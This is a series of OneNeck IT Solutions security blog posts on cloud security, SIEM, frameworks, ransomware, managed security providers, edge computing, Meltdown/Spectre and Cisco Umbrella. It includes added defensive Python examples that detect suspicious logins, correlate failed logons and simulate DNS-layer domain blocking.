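            "ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"),
            "ok": m["result"] == "Accepted",
            "user": m["user"],
            "ip": m["ip"],
        })
    return events


def detect_guessing_success(events: List[Dict], threshold: int = 5,
                            window: timedelta = timedelta(minutes=10)) -> List[Dict]:
    """A success preceded by at least `threshold` failures from the same ip/user within `window`."""
    failures = defaultdict(deque)
    alerts = []
    for e in sorted(events, key=lambda e: e["ts"]):
        q = failures[(e["ip"], e["user"])]
        while q and e["ts"] - q[0] > window:   # drop failures outside the sliding window
            q.popleft()
        if e["ok"]:
            if len(q) >= threshold:
                alerts.append({"user": e["user"], "ip": e["ip"], "failures": len(q), "ts": e["ts"]})
            q.clear()
        else:
            q.append(e["ts"])
    return alerts


def detect_new_source(events: List[Dict], baseline: Dict[str, Set[str]]) -> List[Dict]:
    """Successful logins from an address not in the user's known-good baseline."""
    return [
        {"user": e["user"], "ip": e["ip"], "ts": e["ts"]}
        for e in events
        if e["ok"] and e["ip"] not in baseline.get(e["user"], set())
    ]


if __name__ == "__main__":
    evts = parse_auth_log(LOG_LINES)
    for a in detect_guessing_success(evts):
        print(f"credential guessing succeeded: {a['user']} from {a['ip']} after {a['failures']} failures")
    for a in detect_new_source(evts, BASELINE):
        print(f"login from new source: {a['user']} from {a['ip']} at {a['ts']:%H:%M}")
```

Alice's single typo before a successful login from her usual address produces no alert, which is the point of both the threshold and the baseline: the review is meant to surface the unusual, not every failed password. The same two checks apply unchanged to cloud console or application audit logs once the regular expression is swapped for that log's format.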

Matching Security to Different Cloud Services

When working with cloud service providers, you need to match your security protocols to the types of cloud services provided. Public cloud services are offered over the Internet with computing and storage resources shared among tenants, so you depend on the provider’s isolation controls and must secure your own tenancy carefully. A private cloud offers dedicated connectivity and resources and is fully customizable, which makes it easier to manage systems security. Private clouds can be more secure, but they also require the corporate IT department to manage more aspects of the service, which means more staff, more management, more maintenance, and more accountability for data security.

Depending on your cloud service needs, consider developing a cloud vendor checklist.

For Infrastructure-as-a-Service (IaaS) and Platform-as-a-Service (PaaS), cloud vendors are responsible for securing the infrastructure and customers secure the applications. With Software-as-a-Service (SaaS) and Applications-as-a-Service (AaaS), the cloud provider is responsible for securing the applications as well as the infrastructure. However, SaaS and AaaS vendors often use third-party IaaS cloud services, which makes security more complicated. Be sure that your security policies and procedures (e.g. authentication, inspection, and monitoring) can be integrated with SaaS and AaaS services.

Hybrid cloud strategies that combine on-premises, private, and public cloud services are becoming more popular, which means standardizing security across environments can be an issue. Security protocols will have to vary to accommodate each environment. Ideally, end users should be able to view and manage security across the entire infrastructure using a common set of tools, i.e., a single pane of glass. Unfortunately, that kind of security transparency isn’t always available.

When considering cloud service providers, be sure you are working with vendors that understand cloud security. That means they have cloud-based versions of security solutions, centralized security management, centralized event management, etc. Also look for vendors who work with leading cloud service vendors such as Amazon Web Services (AWS), Microsoft Azure, IBM Cloud, Oracle Cloud, and others. Cloud service contracts change and you want to make sure your security procedures follow you wherever your data resides.

Achieving security in the cloud is possible, but it isn’t guaranteed. Organizations need to implement their security policies and procedures in conjunction with their cloud provider to provide the highest levels of protection against cloud security risks.

Not sure where to start? Contact OneNeck IT Solutions to speak with our cloud security experts.

Using (SIEM) Technology to Combat Alert Fatigue | https://www.oneneck.com/blog/security/using-siem-to-combat-alert-fatigue/ | Tue, 02 Oct 2018 19:30:00 +0000

Early detection, rapid response, and collaboration to mitigate advanced threats impose significant demands on today’s enterprise security teams.

According to a report from the Ponemon Institute, of the 17,000 malware alerts the average organization receives weekly, less than a fifth are reliable. They also state that false alerts cost organizations $1.27 million annually.

It’s no surprise that the overwhelming volume of alerts has caused IT teams in many organizations to experience “alert fatigue.”

Alert fatigue is the threshold at which it becomes too difficult for IT teams to recognize the important alerts from the stream of everything that they receive, says Maxine Holt, principal analyst at the Information Security Forum (ISF).

But… threats aren’t going away anytime soon, and the number of endpoints your team manages is only going to increase, so how can you mitigate alert fatigue? Enter security information and event management (SIEM) technology.

What is SIEM?

Gartner defines SIEM as technology that supports threat detection and security incident response through the real-time collection and historical analysis of security events from a wide variety of event and contextual data sources. SIEM:

  • Supports threat detection and security incident response through the real-time collection and historical analysis of a wide variety of data sources
  • Supports compliance reporting and incident investigation through historical data analysis
  • Is capable of broad-scope event collection and correlating and analyzing events across disparate sources

How Does SIEM Work?

SIEM software collects and aggregates log data generated throughout the organization’s technology infrastructure.

The software then identifies and categorizes incidents and events, as well as analyzes them. The software delivers on two main objectives, which are to:

  • provide reports on security-related incidents and events, such as successful and failed logins, malware activity and other possible malicious activities and
  • send alerts if analysis shows that an activity runs against predetermined rulesets and thus indicates a potential security issue.
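As an added illustration of the collect, normalize and rule-based-alert flow described above (example code written for this page, not OneNeck’s SIEM service or any vendor’s product), the following Python correlates constructed logon events from two disparate sources and raises one alert per source IP instead of one per failed login. The log lines, hosts, IP addresses, users and the failure threshold are all made up.

```python
import csv
import io
import re
from collections import defaultdict

# Constructed sample input (not real logs): an sshd auth log from a Linux host
# and a CSV export of Windows Security events (4625 = failed logon, 4624 = logon).
LINUX_AUTH_LOG = """\
Oct 02 10:01:02 web01 sshd[2201]: Failed password for admin from 203.0.113.7 port 51234 ssh2
Oct 02 10:01:05 web01 sshd[2201]: Failed password for admin from 203.0.113.7 port 51236 ssh2
Oct 02 10:01:09 web01 sshd[2201]: Failed password for admin from 203.0.113.7 port 51240 ssh2
Oct 02 10:01:15 web01 sshd[2205]: Accepted password for admin from 203.0.113.7 port 51244 ssh2
Oct 02 10:02:00 web01 sshd[2210]: Failed password for bob from 198.51.100.4 port 40000 ssh2
"""
WINDOWS_SECURITY_CSV = """\
2018-10-02T10:03:00,dc01,4625,alice,203.0.113.7
2018-10-02T10:03:04,dc01,4625,alice,203.0.113.7
2018-10-02T10:03:30,dc01,4624,alice,10.0.0.5
"""

SSHD_RE = re.compile(r"(Failed|Accepted) password for (?:invalid user )?(\S+) from (\S+) port")
WIN_OUTCOMES = {"4625": "failure", "4624": "success"}


def parse_linux_auth(text):
    """Normalize sshd lines into the common event schema used for correlation."""
    events = []
    for line in text.splitlines():
        m = SSHD_RE.search(line)
        if not m:
            continue  # not a logon event; ignored rather than alerted on
        events.append({
            "source": "linux_auth",
            "host": line.split()[3],
            "user": m.group(2),
            "src_ip": m.group(3),
            "outcome": "success" if m.group(1) == "Accepted" else "failure",
        })
    return events


def parse_windows_csv(text):
    """Normalize Windows Security CSV rows (timestamp,host,event_id,user,src_ip)."""
    events = []
    for row in csv.reader(io.StringIO(text)):
        if len(row) != 5 or row[2] not in WIN_OUTCOMES:
            continue
        _ts, host, event_id, user, src_ip = row
        events.append({
            "source": "windows_security",
            "host": host,
            "user": user,
            "src_ip": src_ip,
            "outcome": WIN_OUTCOMES[event_id],
        })
    return events


def correlate(events, threshold=3):
    """Apply one predetermined rule across all sources: raise a single alert per
    source IP with at least `threshold` failed logons, escalated to high severity
    when the same IP also has a successful logon anywhere in the estate."""
    failures = defaultdict(list)
    success_hosts = defaultdict(set)
    for e in events:
        if e["outcome"] == "failure":
            failures[e["src_ip"]].append(e)
        else:
            success_hosts[e["src_ip"]].add(e["host"])
    alerts = []
    for src_ip, fails in failures.items():
        if len(fails) < threshold:
            continue
        followed_by_success = bool(success_hosts.get(src_ip))
        alerts.append({
            "rule": "repeated_failed_logons",
            "src_ip": src_ip,
            "failure_count": len(fails),
            "hosts": sorted({f["host"] for f in fails}),
            "users": sorted({f["user"] for f in fails}),
            "sources": sorted({f["source"] for f in fails}),
            "followed_by_success": followed_by_success,
            "severity": "high" if followed_by_success else "medium",
        })
    return alerts


def run_example():
    """Collect, normalize and correlate the constructed logs; returns the raw
    failed-logon count (what per-event alerting would emit) and the alerts."""
    events = parse_linux_auth(LINUX_AUTH_LOG) + parse_windows_csv(WINDOWS_SECURITY_CSV)
    raw_failures = sum(1 for e in events if e["outcome"] == "failure")
    return raw_failures, correlate(events)


if __name__ == "__main__":
    print(run_example())
```

On the constructed input, six raw failed-logon events across both sources collapse into one high-severity alert for 203.0.113.7, while the single failure from 198.51.100.4 stays below the rule threshold.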

Connecting the Dots with SIEM

With SIEM technology in place, organizations can centralize, index, and visualize event data from multiple sources. From this ‘single pane of glass’, SIEM tools show you actual and potential threats that your team can then investigate and triage.

SIEM technologies are not meant for teams to “set it and forget it.” The ongoing development and management of the SIEM is key to ensuring that an organization maximizes its capabilities for use in detecting threats.

The Advantage of a Managed SIEM

Managing a SIEM can be a daunting task…tuning the alerts, optimizing the reports, triaging alerts.

That’s why OneNeck® IT Solutions offers a scalable Security Information and Event Management (SIEM) service for our customers. Our SIEM service includes log aggregation, analysis and storage for almost any type of system or device that generates log events or system log messages. In addition, we facilitate rapid incident response, log management and compliance reporting.

Speak with a OneNeck security specialist today about how our comprehensive approach to SIEM can protect your data and your business.

Choosing a Security Framework | https://www.oneneck.com/blog/security/choosing-a-security-framework-solution/ | Thu, 13 Sep 2018 20:00:00 +0000

Running a security program can be an overwhelming task. There are so many factors to consider, including encryption, application security, disaster recovery and, let’s not forget, adherence to compliance mandates such as HIPAA and PCI DSS. How then do security professionals prioritize and maintain their efforts to build the most effective security program for their business? That’s where an IT security framework comes in.

What is an IT Security Framework?

A security framework is a comprehensive strategy for going toe-to-toe with potential threats while keeping data secure. It is a tool that provides methodology and a calculated process for assessing risk to determine where resources need to go to protect the information systems within an organization.

Examples of IT Security Frameworks

While there is a plethora of security frameworks out there, this blog aims to highlight the most common frameworks leveraged today including:

NIST Cybersecurity Framework

Created by the federal government, this voluntary Framework consists of standards, guidelines, and best practices to manage cybersecurity-related risk.  The Cybersecurity Framework’s prioritized, flexible, and cost-effective approach helps to promote the protection and resilience of critical infrastructure and other sectors important to the economy and national security.

ISO 27001 ISMS

The ISO/IEC 27000 family is a key set of international information security standards aimed at helping organizations manage the security of assets such as financial information, intellectual property, employee details or information entrusted to you by third parties.

ISO/IEC 27001 is the best-known standard in the family providing requirements for an information security management system (ISMS).

What is an ISMS?

According to ISO, an ISMS is a systematic approach to managing sensitive company information so that it remains secure. It includes people, processes and IT systems by applying a risk management process.

CIS

The Center for Internet Security (CIS) Top 20 Critical Security Controls (previously known as the SANS Top 20 Critical Security Controls) are a prioritized set of actions that collectively form a defense-in-depth set of best practices that mitigate the most common attacks against systems and networks.

A principal benefit of the Controls is that they prioritize and focus a smaller number of actions with high pay-off results. The Controls are effective because they are derived from the most common attack patterns highlighted in the leading threat reports and vetted across a very broad community of government and industry practitioners. The Controls take best-in-class threat data and transform it into actionable guidance to improve individual and collective security in cyberspace.

Choosing the Right Security Framework to Fit Your Business

A structured approach to selecting a security framework starts with understanding the security requirements and risks that are unique to your business and your industry. Many industries, including healthcare, government, education and financial services, have industry-specific security compliance regulations they must adhere to.

If your organization is not bound by any industry-specific mandates, pick a framework and ride it. Educate yourself on the entire framework, but don’t overwhelm your organization by trying to tackle every control at once. Pick the pieces where you will have quick wins; in other words, pick a control you can achieve quickly and start there.

Katie McCullough, Former Chief Information Security Officer at OneNeck, suggests that the CIS Top 20 is a great place to start. “As noted by the CIS, its top 20 is a relatively small number of prioritized, well-vetted, and supported security actions that organizations can take to assess and improve their current security state,” says McCullough. “CIS Controls 1 through 6 are essential to success and should be considered among the very first things to be done. We refer to these as ‘Cyber Hygiene’ – the basic things that you must do to create a strong foundation for your defense.”

Don’t go at it alone

OneNeck is here to help you address the broad scope of security and compliance needs that today’s businesses face. We have a depth of experience in assisting our customers with their security needs, and our team is made up of security experts who stay current on emerging threats so you don’t have to.

Understanding your security gaps is key to addressing regulatory obligations and protecting your organization from breach. We can help by conducting assessments designed to identify vulnerabilities in your IT systems and gaps in your security program, followed by a thorough gap analysis that will leave you with a roadmap to remediation and compliance.

OneNeck Security Assessment and Strategy services include:

  • Cybersecurity Assessment
  • Framework assessment & implementation
  • Policies & Standards
  • Penetration Testing
  • Vulnerability Management

Contact us to learn more.

Back to the IT Security Basics | IT Security Services | https://www.oneneck.com/blog/security/back-to-security-basics/ | Tue, 31 Jul 2018 19:00:00 +0000

If there’s any constant in today’s technology landscape, it’s change. And when it comes to security, there’s no rest for the weary. Advancing technology, savvier-than-ever users and the onslaught of attacks are making today’s IT teams scramble to keep up. Now more than ever, it’s critical to make sure the basics are covered so that you have the ability to respond and keep your business safe.

I recently sat down with OneNeck’s CISO, Katie McCullough, to discuss some of the key fundamentals organizations must keep in mind when developing a security strategy.

A few of Katie’s pointers were:

  1. Keep your software up to date. This may seem like a given, but many organizations struggle to make patching a priority when they’re busy just trying to grow the bottom line. But much like the Equifax breach, many attacks are avoidable with routine and timely patching.
  2. Educate and train your employees. The bad guys aren’t getting any dumber, and they know that phishing is still a great way to get inside your organization. No matter how many tools you have, if your employees aren’t trained to recognize phishing schemes, then no tool can keep you safe.
  3. Compliance measures aren’t just an operational burden. It’s critical to document your processes, train your teams on those processes and monitor their adherence to build the solid foundation to keep your organization safe.
  4. Develop an incident response plan. In the event that you do experience a breach, an incident response plan will help you know exactly what steps to follow so that you can respond quickly and mitigate the attack before it does even more damage.

These are just some of the tips Katie discusses in her Point of View Paper on security and compliance. If you’d like to read this insightful paper, download it now…


A Multi-Vendor Security Environment Could Put You at Risk | https://www.oneneck.com/blog/security/is-your-multi-vendor-security-environment-putting-you-at-risk/ | Thu, 29 Mar 2018 16:18:00 +0000

One of the big challenges organizations face today is complexity, and security is no exception. According to the 2018 Cisco Annual Cybersecurity Report, in 2017, 25% of security professionals said they used products from 11 to 20 vendors, compared with 18% of security professionals in 2016. Also, in 2017, 16% said they use anywhere from 21 to 50 vendors, compared to 7% of respondents in 2016 (refer to figure below).

[Figure: more security vendors]

As the number of vendors increases, so does the challenge of orchestrating alerts from these many vendor solutions. The report continues to state that 54% of security professionals said that managing multiple vendor alerts is somewhat challenging, while 20% said it is very challenging.

So, what is the result of this complexity in vendors and point solutions? The report finds that:

  • Nearly half of the security risk organizations face stems from having multiple security vendors and products.
  • 80% of organizations using more than 50 vendors had to manage scrutiny from public breaches.
  • In organizations with more than 50 security vendors, 81% experienced losses of at least US$1 million—with 29% seeing losses of US$10 million or more.

And in a security vendor landscape that looks a lot like this…

[Figure: the cybersecurity vendor landscape is complex]

What’s an organization to do?

Simply eliminating vendors is not the only solution to reducing risk. Choosing vendors strategically—and with an eye toward integration rather than simply appending boxes to endpoints—can help defenders to focus on the risks that matter most.

This might just be the perfect time for you to start addressing the need to simplify your network security and invest in more proactive, intelligent solutions that take a more immersive and comprehensive approach. At OneNeck, we’re here to help. Our security assessments, built on industry-based frameworks, can help you assess your gaps and ensure those disparate point solutions aren’t leaving you vulnerable.

Ransomware…it’s Big Business | https://www.oneneck.com/blog/security/ransomware/ | Thu, 22 Mar 2018 16:00:00 +0000

Ransomware has quickly become the most profitable form of malware ever seen, on its way to becoming a $1 billion annual market. Last year, the FBI reported more than 4,000 ransomware attacks occurred daily between January and June of 2016 — a 300% increase from 2015. In 2017, nearly 10% of organizations worldwide recorded some sort of ransomware activity during Q1.

Ransomware is malicious software, or malware, that encrypts the information on a person’s computer, such as documents, photos, and music. It will not release the files until the user pays a fee – or ransom – to unlock the files and get them back. The attack vectors are varied and wide-ranging. Delivered by infected ads that contain malware, by phishing messages, or by exploit kits, this malware is quickly evolving in sophistication. These infections can be catastrophic to businesses over a short or long period of time. Hospitals, public safety organizations, banks and financial institutions, and retail establishments have been targeted the most.

Why Is It Surging?

Ransomware isn’t new; in fact, it has been around for over a decade. But its recent spike is due to a few primary drivers.

  1. Attack surface expansion: The proliferation of mobile devices, cloud, digitization efforts and IoT gives cyber criminals more space to operate.
  2. Better targets: Organizations are more lucrative targets for cyber criminals. They house highly sensitive data, often have thinly stretched IT departments and a high incentive to quickly settle the matter.
  3. Ransomware as a Service: Just about everything is available as a service these days, including ransomware. RaaS is designed to make cybercrime accessible to anyone. Cybercriminals will author the malicious code, then make it available for others to download and use.
  4. Alternative currency: Payment made in bitcoin, a cryptocurrency and a digital payment system, can’t be traced back to sender or recipient, providing an anonymous, friction-free way to collect ransoms. The risk of being caught is greatly reduced.

With the rate of sophisticated ransomware attacks increasing at an alarming rate, it’s important for organizations to have a multi-layer defense strategy in place.  

OneNeck IT Solutions, Your Trusted Ransomware Defense Partner

At OneNeck, we recognize threats can enter the network in a variety of ways. We understand that having comprehensive protection requires a multi-tiered and pervasive approach to keep threats out as well as detect and isolate any breaches quickly. We can assess your infrastructure for its strengths and weaknesses, then recommend and implement a solution that will keep your critical data safe.

Looking for more than just ransomware defense and cybersecurity? OneNeck provides an end-to-end, technology-independent approach that includes a complete suite of hybrid IT offerings across infrastructure, applications and managed services.


5 Reasons Smart Companies Outsource Cybersecurity | https://www.oneneck.com/blog/security/5-reasons-smart-companies-outsource-cybersecurity/ | Tue, 13 Mar 2018 16:00:00 +0000

Today’s consumers demand their private information remains secure. But as we learned from the 2017 breach at Equifax that exposed the personal information of 145 million, even what should be the most secure companies fall under attack.

Fearing the loss of consumer trust and revenue, senior executives demand protection against attacks like last year’s infamous WannaCry ransomware that impacted over 300,000 machines in 150 countries running outdated Windows software.

These fears and expectations are heavy burdens for IT teams that may lack the training, skills or tools to respond effectively to security breaches or prevent them from happening in the first place.

Business Security Challenges

The growing complexity and frequency of cybercrime make cybersecurity a full-time job. But at smaller companies, security is often spread among members of an over-taxed IT team or put squarely on a CIO’s desk along with hundreds of other responsibilities.

The widening IT talent gap just exacerbates the problem, with CSO reporting cybercrime will more than triple the number of unfilled cybersecurity jobs, predicted to reach 3.5 million by 2021. With cybersecurity spending expected to exceed $1 trillion from 2017 to 2021, managing costs can also be a struggle.

Benefits of Outsourcing Cybersecurity

For many overwhelmed companies, a viable solution for addressing the costs and complexity of cybersecurity is outsourcing it to a managed security service provider (MSSP). They find relief with these benefits:

1) Improved protection at less cost.

Outsourcing shifts increasing costs to providers better suited to meet them. MSSPs can spread costs across a wide client base. By scaling solutions that meet varied needs, businesses get security protection without the attendant costs.

2) Improved efficiencies with less cost.

Outsourcing significantly expands your access to security experts while saving hiring costs. It also frees IT to work on initiatives focused on increasing your bottom line.

3) The latest developments at your doorstep.

MSSPs can bring beneficial advancements to your door. Artificial intelligence and blockchain technology show real promise in the future of security, and MSSPs are at the forefront of integrating these and other technologies into top-notch security solutions.

4) Protection around the clock.

MSSPs are incessantly vigilant in protecting all systems and access points — a nebulous undertaking as businesses maximize efficiencies in the Internet of Things (IoT).

Round-the-clock protection greatly improves threat prevention. Monitoring security across a variety of clients and industries also helps MSSPs detect new threats and risks before they develop into catastrophes.

5) Layered protection against human error.

Security providers can offer layered protection with extensive security checks and procedures that are far more likely to prevent the types of internal employee mistakes that cause massive data breaches.

Selecting the Right Security Partner

Your MSSP is a partner who helps grow your business securely. When evaluating providers, consider these recommendations:

  • Make sure you feel confident in the provider’s ability to understand your business, anticipate your needs and align solutions to your goals.
  • Look for a provider committed to investing in the ongoing skills and education of its employees.
  • Look for expertise in transformative solutions such as cloud, big data management and analytics.
  • To optimize your partnership, make sure the provider you choose can meet your expectations for communication, teamwork, transparency and leadership.

OneNeck® IT Solutions is a trusted business partner for developing customized solutions to protect against cybercrimes. Learn more about our Virtual CISO Services.

Is your data living on the edge? Let’s talk Edge Computing. | https://www.oneneck.com/blog/security/lets-talk-edge-computing/ | Thu, 22 Feb 2018 18:00:00 +0000

There’s a new buzzword making the rounds (like we needed another one). Move over Digital Transformation, and welcome Edge Computing. While it’s being credited with the power to deliver speed, security and cost-savings to organizations, is it really all that? Let’s break it down…

What Is Edge Computing?

Research firm IDC defines edge computing as a “mesh network of microdata centers that process or store critical data locally and push all received data to a central data center or cloud storage repository, in a footprint of less than 100 square feet.” In other words, it involves processing data at the edge of the network where it is created, instead of routing it through data centers or clouds.

Fog Computing vs. Edge Computing

Another term related to edge computing is fog computing. It’s important to understand the distinction.

“Fog” refers to the network of connections between edge devices and the cloud, while “edge” represents what happens near or on the edge devices (the endpoints). Fog computing includes edge but uses the network to get edge data where it’s going.

What’s Driving Edge Computing?

More organizations are adopting large-scale IoT deployments with Gartner estimating enterprise use of IoT devices will grow to 7.5 billion by 2020. Transporting data to the cloud from IoT devices for management and analysis is costly, inefficient and can impact latency.

Many organizations simply don’t have the connectivity to support sending large amounts of data to and from the cloud. With its on-device approach, edge computing addresses these limitations by performing the computing and analytics on the device itself — eliminating the need for data transport.

Edge Computing Advantages and Challenges

Edge computing gives applications that rely on machine learning an advantage by increasing data processing efficiency. By doing away with the need for device-to-cloud data trips, on-device machine learning makes applications more responsive and robust. Machine-learning-driven capabilities like facial recognition or voice recognition are quicker and more efficient when done on-device.

By maintaining sensitive data at the source rather than sending it to the cloud, edge computing also offers security advantages. The less data in various locations, the fewer the opportunities for cybercriminals to access it and compromise it. Countering this is the argument that the vulnerability of edge devices to compromise is a risk to data kept at the edge.

The takeaway here is that mitigating IoT security risks requires work, planning and vigilance. A good IoT strategy includes a robust plan for keeping your system secure.

According to the Hewlett Packard Enterprise study, The Internet of Things: Today and Tomorrow, eighty-four percent of IoT adopters say they have experienced at least one IoT security breach with malware, spyware and human error the most common culprits. Ninety-three percent of executives expect IoT security breaches to occur in the future.

How do you build an IoT strategy that drives the speed to market you desire but simultaneously keeps your data safe? Simple – an upfront strategy that takes the inherent risks into consideration is a must. At OneNeck, our security team is ready to help you assess your security risk and work with you to develop a realistic strategy to keep you secure and get the most from your data on the edge.

Update on CPU Vulnerability | https://www.oneneck.com/blog/cpu-vulnerability/ | Thu, 04 Jan 2018 05:18:00 +0000

OneNeck IT Solutions, along with other technology companies across the country, has learned of a potential flaw that could allow hackers the opportunity to access portions of memory through your CPU.

Currently, there are no known exploits. Our team is actively investigating this matter and working closely with our vendors to understand the situation and formulate a strategy that protects our customers against this vulnerability.

For the best protection, please continue to use and follow good security practices that protect against malware, and confirm your anti-malware software is fully up to date. In general, this will help protect against possible exploitation. For our managed services customers, rest assured, we are vigilantly monitoring your infrastructure and working to keep it safe.

We will provide an update tomorrow at 3:30 p.m. central, sooner if more information becomes available.

For additional information:

https://newsroom.intel.com/news/intel-responds-to-security-research-findings/

https://www.theregister.co.uk/2018/01/02/intel_cpu_design_flaw/


Update #2 on Meltdown and Spectre CPU vulnerability

January 4, 2017

OneNeck IT Solutions, along with other technology companies across the country, continues to evaluate the Meltdown and Spectre CPU vulnerability. There are no known exploits at this time.
 
We are working with our vendors to help protect our customers’ virtual infrastructure environments and are in the process of hardening our infrastructure with their guidance.
 
Operating System (OS) vendors are beginning to release patches for this vulnerability. We are reviewing these patches as they’re released and plan to follow our normal roll-out process for applying them. At this time it appears unsupported legacy operating systems will not be receiving a patch from vendors for this vulnerability.
 
Future updates will be provided, as appropriate. Please continue following security best practices against malware and reduce internet browsing from servers, as much as possible.
 
For additional information: https://meltdownattack.com/

Checklist for Selecting a Managed Security Services Provider | https://www.oneneck.com/blog/managed-services/7-point-checklist-for-selecting-a-managed-security-service-provider/ | Tue, 28 Nov 2017 19:30:00 +0000

A look inside many of today’s SOCs will show stressed-out security teams who are spending more time responding to emergency issues than developing strategies to improve their security ecosystems.

Security teams typically rely on reactive tools that lack the visibility they need to effectively and proactively strategize for emerging security challenges. Most SOCs are struggling with operations challenges, which has given rise to Everything-as-a-Service.

Chief among those challenges is the lack of skilled staff needed to navigate the complexities of a modern network. By 2021, more than 3.5 million cybersecurity jobs will need to be filled. It is also predicted that cybercrime will increase at a rate three times faster than jobs, which will inevitably result in increased spending on security.

Managed security service providers (MSSPs) offer much-needed solutions, but how do you choose the most reliable MSSPs to monitor, manage and get ahead of threats to your business?

7 Points to Evaluate When Choosing a Managed Security Services Provider

  1.  A mixed bag of services: Your business risks are unique, as is your budget. In order to deliver the most in-depth security coverage, you should look for providers that offer a wide range of services, provide multiple service levels, give you the ability to mix and match and have prepackaged offerings.
  2.  Align intelligence: Make sure your MSSP does more than monitoring and device management. Look for providers whose services align with your security initiatives and deliver integrated security intelligence that aligns with IT infrastructure and back-end technology.
  3.  Dedicated research resources: Extensive internal and external resources that deliver insight on the latest threats, vulnerabilities and strategies for remediation are strong indicators of a mature MSSP.
  4.  Solid reputation with vision: As with any service provider, customer satisfaction tells an important story. Review analyst reports and understand the provider’s vision for the future as well as the actions they are taking to ensure their direction supports your security goals.
  5.  Infrastructure and integration: You’ll get more value from an MSSP that offers integrated technology services and demonstrates a deep understanding of security best practices related to hardware, software, data center and network requirements.
  6.  Manage beyond its own suite: To avoid the future cost of technology changes, make sure your MSSP can protect your existing investments by requesting a list of platforms the provider is certified to manage.
  7.  Sustainable, stable resources: A sustainable business model demands significant resources that will ensure financial stability. A successful MSSP has the resources and capabilities to invest in new technologies and attract highly skilled staff.

Defending against today’s threats demands an MSSP that can help you reduce risk with a higher level of efficiency. With industry-leading technology, OneNeck’s security controls deliver operational excellence and compliance through rigorous, flexible and accessible management services. Contact us to learn more about our managed security services. 

OneNeck IT Security | Scared of Outside Network Threats?
https://www.oneneck.com/blog/security/threats-to-your-users-outside-of-your-network-got-you-scared/
Tue, 31 Oct 2017 16:00:00 +0000

Long gone are the days of yore, when IT administrators slept like babies, content that their company desktops, business apps and critical infrastructure were all tucked in safe, securely located behind a firewall. Today, an enterprise user is spending more time outside the safe haven of the network’s security and roaming on other networks in the big, terrifying world.

EEK!

By 2021, Gartner predicts the average company will have 25% of its corporate data traffic bypassing the network perimeter. 25 percent! So, a quarter of the time, enterprise users will be opening themselves (and the business) to serious risk, meaning the traditional approach of “secure the perimeter” is likely to fail, opening the door for malware, ransomware and other malicious attacks.

DOUBLE EEK!

So, what is an IT professional to do to get a good night’s sleep? Well, it’s time to think beyond the perimeter…

Expanding Security to the Great Outdoors
So, how do you protect your mobile workforce from anywhere they access the Internet? Let’s talk Cisco Umbrella.

Cisco Umbrella is a cloud-based gateway built on technology from OpenDNS and other acquisitions (e.g., CloudLock), together with existing Cisco security services, that secures business access to resources outside the perimeter even when users are not on a VPN. As a Secure Internet Gateway, Umbrella provides the first line of defense against threats on the Internet wherever users go. The key is visibility into activity in all locations and on all user devices, so that threats are blocked before they ever reach the corporate network.

But how does it work?

When a user clicks a link or types a URL, a DNS request is initiated to map the domain name to an IP address; that lookup is the first step in connecting a device to the Internet. Umbrella applies threat intelligence at this step to determine whether the request is safe, malicious or risky. Safe requests are resolved normally, and malicious requests are blocked. A questionable request is routed to a cloud-based proxy for deeper inspection to decide whether it is malicious. Attempted file downloads from those questionable sites are also examined using anti-virus engines and Cisco Advanced Malware Protection (AMP). Once the destination is determined to be safe or malicious, the connection is allowed or blocked.


Another cool Umbrella feature: because it is constantly analyzing Internet activity, resolving billions of requests from around the world and storing the results in a massive database, it learns as it goes. It can proactively block requests to destinations it has already learned are malicious, keeping users safe from phishing and malware infections before they happen, so IT can sleep knowing their users afar are protected.
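To make the three-way DNS-layer decision (allow, block, or proxy for deeper inspection) and the "learns as it goes" behaviour concrete, here is a small simulation. It is an added example, not Cisco's code: the reputation lists, the entropy heuristic used to call an unknown domain "risky", the file hash the proxy matches and every sample domain are constructed assumptions.

```python
"""Simulation of a DNS-layer secure internet gateway decision flow.

Added example, not Cisco's code: the reputation lists, the entropy
heuristic for "risky" domains, the file hash the proxy matches and
all sample domains are constructed assumptions.
"""
import hashlib
import math
from collections import Counter
from dataclasses import dataclass, field
from typing import Optional

# Constructed reputation data; a real gateway gets this from threat feeds.
KNOWN_MALICIOUS = {"update-flash-now.example", "bank-login-verify.example"}
KNOWN_SAFE = {"www.example.com", "cdn.example.net"}
# Constructed stand-in for a malware signature the proxy-side AV engine knows.
MALWARE_SHA256 = {hashlib.sha256(b"constructed malicious payload").hexdigest()}
ENTROPY_RISK_THRESHOLD = 3.5   # assumed cut-off for "looks machine-generated"


def registrable_label(domain: str) -> str:
    """Second-level label ('example' in 'www.example.com')."""
    parts = domain.lower().rstrip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def label_entropy(domain: str) -> float:
    """Shannon entropy (bits per character) of the registrable label.
    Random-looking labels score high; this is a constructed risk heuristic."""
    label = registrable_label(domain)
    counts = Counter(label)
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


@dataclass
class DnsGateway:
    # Destinations learned to be malicious from earlier deep inspections.
    learned_malicious: set = field(default_factory=set)

    def dns_verdict(self, domain: str) -> str:
        """Decide at resolution time: 'allow', 'block' or 'proxy'."""
        if domain in KNOWN_MALICIOUS or domain in self.learned_malicious:
            return "block"
        if domain in KNOWN_SAFE:
            return "allow"
        # Unknown destination: risky if the label looks random, else allow.
        if label_entropy(domain) >= ENTROPY_RISK_THRESHOLD:
            return "proxy"
        return "allow"

    def proxy_inspect(self, domain: str, download: Optional[bytes]) -> str:
        """Deeper inspection of a risky request. A matched download blocks
        the connection and teaches the gateway to block the destination at
        the DNS layer for every later request."""
        if download is not None and hashlib.sha256(download).hexdigest() in MALWARE_SHA256:
            self.learned_malicious.add(domain)
            return "block"
        return "allow"

    def handle(self, domain: str, download: Optional[bytes] = None) -> str:
        """Full flow for one request; returns the decision taken."""
        verdict = self.dns_verdict(domain)
        if verdict != "proxy":
            return verdict
        return "proxy:" + self.proxy_inspect(domain, download)


if __name__ == "__main__":
    gw = DnsGateway()
    for domain, payload in [
        ("www.example.com", None),
        ("update-flash-now.example", None),
        ("xk9q2zv7wm3pfl.example", b"constructed malicious payload"),
        ("xk9q2zv7wm3pfl.example", None),   # now blocked at the DNS layer
    ]:
        print(f"{domain:28s} -> {gw.handle(domain, payload)}")
```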

But, any experienced IT professional is going to ask, does Umbrella integrate with my existing security tools? Yep! Integration with your existing security stack (i.e., security appliances, intelligence platforms and cloud access security broker controls) is part of the solution. Log data regarding Internet activity is pushed to your SIEM or log management systems via an API, enabling Umbrella to block malicious domains as an extension of your current security tools.

